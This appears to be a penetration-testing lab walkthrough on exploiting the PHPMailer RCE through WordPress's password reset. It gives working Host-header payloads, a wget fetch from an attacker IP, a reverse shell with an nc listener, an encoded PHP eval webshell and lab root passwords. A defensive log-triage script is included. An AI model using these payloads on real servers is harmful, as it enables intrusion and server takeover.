E048-Forum Vulnerability Analysis and Exploitation-Exploration of Remote Code Execution for WordPress Forum Plug-in

Course name:

E048-Forum Vulnerability Analysis and Exploitation-Exploration of Remote Code Execution for WordPress Forum Plug-in

Course Category:

Forum vulnerability analysis and utilization

Experimental Level:

Intermediate

Task scenario:

【Task Scenario】

Xiao Wang has been invited by Panshi Company to conduct a penetration test on the company's forum. He has discovered that the forum's WordPress installation uses the PHPMailer component to send emails to users. The component version is 5.2.18, which has a remote code execution vulnerability, and he exploited it successfully. Once the vulnerability is exploited, the intruder can execute arbitrary code remotely. Many well-known CMSs such as WordPress use this component to send emails, so the impact cannot be ignored.

Task analysis:

【Task Analysis】

If no common injection vulnerabilities are found, you can start from the installed plug-ins and components. For example, WordPress <= 4.7.1 with PHPMailer (version < 5.2.18) has a remote command execution vulnerability. It is an unauthenticated RCE vulnerability in WordPress Core 4.6: an unauthenticated attacker can exploit it to achieve remote code execution and immediate access to the target server, ultimately leading to the complete compromise of the application server. No plug-ins or non-standard settings are required. The attacker only needs to craft a malicious email address to write to an arbitrary file, resulting in remote command execution. From there, penetration testing tasks such as backdoor placement, file management, resource search, command execution and system information collection become possible.

Preliminary knowledge:

【Preliminary knowledge】

Versions of PHPMailer before 5.2.18 suffer from a remote code execution vulnerability, which can lead to remote control of the device. The mailSend function in the PHPMailer isMail transport, when the Sender property is not set, can allow a remote attacker to pass extra parameters to the mail command and therefore execute arbitrary code by supplying an address crafted with a \" (backslash double quote). The webshell planted afterwards works over GET/POST requests: on the server side, the Trojan responds to each GET/POST request and generates a response packet.

(Figure: the calling relationship of the key functions when PHPMailer sends an email.)

Task implementation:


Task environment description:

Server scenario: p9_kali-6 (username: root; password: toor)

Server scenario operating system: Kali Linux 192.168.32.123

Server scenario: p9_linux-9 (username: root; password: 123456)

Server scenario operating system: Linux 192.168.32.184


Hands-on reproduction:

Enter the target machine, open a command terminal and run docker run -i -t --rm -d -p 80:80 medicean/vulapps:w_wordpress_6 to start the vulnerable container. Then run docker ps to list the currently running containers, and finally run docker exec -it ContainerID /bin/bash to get an interactive shell inside the container.

-i: Allows you to interact with the standard input within the container

-t: Specify a pseudo terminal or terminal within the new container

--rm: Delete the container as soon as it exits. Normally this parameter need not be specified, but using --rm avoids wasting disk space.

medicean/vulapps:w_wordpress_6: Start the container based on this image

/bin/bash: designated interactive shell

Use Firefox on the penetration machine to access the vulnerable page at /wp-login.php?action=lostpassword, the password reset page. At this point WordPress calls the PHPMailer component to send the password reset email.

Now enter the target machine and look at the vulnerable file class-phpmailer.php in WordPress, located in the wp-includes directory. Opening it reveals the following key lines of code.

We find that the PHPMailer component calls the Linux system command sendmail to send emails, in the format sendmail -t -i -fusername@hostname. Continuing the code audit, we find:

The serverHostname function obtains the host name from the incoming SERVER_NAME parameter, which is the Host value of the HTTP request. SERVER_NAME is not filtered in any way, so we can construct and splice arbitrary content into it, resulting in a system command injection vulnerability. However, WordPress and the PHPMailer library prevent attackers from injecting whitespace characters (space or TAB) into the sendmail command, and the older trick of using parentheses to inject parameters into sendmail no longer works. Calling /bin/touch is also a problem, because if a / appears in the Host field the server rejects the request. Still, the idea is clear: our first goal is to bypass these checks by constructing suitable expressions, and then use that method to write a webshell backdoor file.

Before constructing the payload, return to the container on the target system. Note that the prompt root@ should be followed by the container ID, otherwise commands will not work as expected. Inside the container, run sendmail -be '$tod_log' to view the system time. (The -be option is exim's string-expansion test mode, which can read the contents of variables; for example, the $tod_log variable holds the system time.)

Moreover, exim4 provides string-expansion syntax that we can use to build the parameters we need (the sendmail binary is actually a symbolic link to exim4, which provides functions such as the substring function substr and the $run system-call function). The command sendmail -be '${substr{10}{1}{$tod_log}}' uses substr to extract one character starting at offset 10 of the expanded $tod_log value, which is a space.

In the same way, extract the / character from the $spool_directory variable (spool_directory exists by default and contains no capital letters, so the expansion works reliably).

Then test the $run function, which calls system commands, to execute a command.

Our preparations are now complete and we can begin constructing the payload. First, try to create a hack.txt file in the /root directory.

The constructed statement is:

cc(any -froot@localhost -be ${run{/bin/touch /root/hack.txt}} null)

Space ==> ${substr{10}{1}{$tod_log}}

Slash ==> ${substr{0}{1}{$spool_directory}}

After conversion it becomes: cc(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}root${substr{0}{1}{$spool_directory}}hack.txt}} null)
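The substr rewriting above is what makes a captured request hard to read in web-server or proxy logs. The following triage helper is an added example, not part of the original lab: it flags a Host header value that carries exim expansion syntax and expands the ${substr{...}{...}{$var}} fragments so an analyst can see the underlying command. The variable values are constructed samples (Debian's default exim4 spool directory and a $tod_log timestamp in exim's "YYYY-MM-DD hh:mm:ss" format); a real investigation would use the values from the affected host.

```python
import re

# Constructed sample values for the two exim variables the payload reads:
# Debian's default exim4 spool directory, and a $tod_log timestamp in
# exim's "YYYY-MM-DD hh:mm:ss" format (offset 10 is the space).
EXIM_VARS = {
    "spool_directory": "/var/spool/exim4",
    "tod_log": "2017-05-05 12:34:56",
}

# Matches one ${substr{start}{length}{$variable}} fragment.
SUBSTR_RE = re.compile(r"\$\{substr\{(\d+)\}\{(\d+)\}\{\$(\w+)\}\}")


def expand_substr(text, variables=EXIM_VARS):
    """Replace every substr fragment with the characters exim would produce."""
    def repl(match):
        start, length, name = int(match.group(1)), int(match.group(2)), match.group(3)
        value = variables.get(name, "")
        return value[start:start + length]
    return SUBSTR_RE.sub(repl, text)


def is_suspicious_host(host):
    """A legitimate Host header is a hostname, optionally with a port.
    Anything else that carries exim expansion syntax or a parenthesised
    sender trick is flagged for review."""
    if re.fullmatch(r"[A-Za-z0-9.-]+(:\d+)?", host):
        return False
    return "${" in host or "(" in host


def triage(host):
    """Summarise one captured Host header value for an analyst."""
    return {"suspicious": is_suspicious_host(host), "expanded": expand_substr(host)}


if __name__ == "__main__":
    # Constructed log value: the converted payload from the lab as it would
    # appear in the Host header of the password-reset request.
    captured = ("cc(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin"
                "${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}"
                "${substr{0}{1}{$spool_directory}}root${substr{0}{1}{$spool_directory}}"
                "hack.txt}} null)")
    print(triage(captured))
```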

Return to the Kali penetration machine, visit the target site http://172.16.1.33 and check that network communication is normal:

Open the back-end login page wp-login.php?action=lostpassword to view it:

Go back to the browser and access the password reset page /wp-login.php?action=lostpassword, enter the user name admin to reset, submit and intercept the request, change the Host value to the constructed payload, and click the Forward button to send it.

Constructed payload:

cc(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.txt}} null)

Go back to the /tmp directory on the target machine and check: the test.txt file has been created on the server:

Write the reverse shell script rce in the Apache root directory with the following content:

Restart the Apache server.

After this command executes, the target machine fetches a.txt from the penetration machine with wget and writes it to the file rce in the /tmp directory. The payload executed is (note that the IP address of the penetration machine in the payload must be changed to yours so that a.txt can be fetched):

aa(any -froot@localhost -be ${run{/usr/bin/wget --output-document /tmp/rce 172.16.1.40/a.txt}} null)

Converted to:

aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}172.16.1.40${substr{0}{1}{$spool_directory}}a.txt}} null)

Run the reverse shell script rce in the /tmp directory. The payload that executes it is:

aa(any -froot@localhost -be ${run{/bin/bash /tmp/rce}} null)

Use nc to listen on port 1345 on the receiving host, then submit the payloads in order to obtain the reverse shell.

nc -nvv -l -p 1345

Extension: some machines may not have /dev/tcp available. Since the target runs WordPress, a PHP environment must exist, so the PoC command can be changed to: echo "PD9waHAgQGV2YWwoJF9QT1NUWyd6J10pOz8+Cg==" | base64 -d > /tmp/z.php && php -S 0:7777 -t /tmp. The detailed steps are not repeated here.

When the experiment is over, shut down the virtual machine.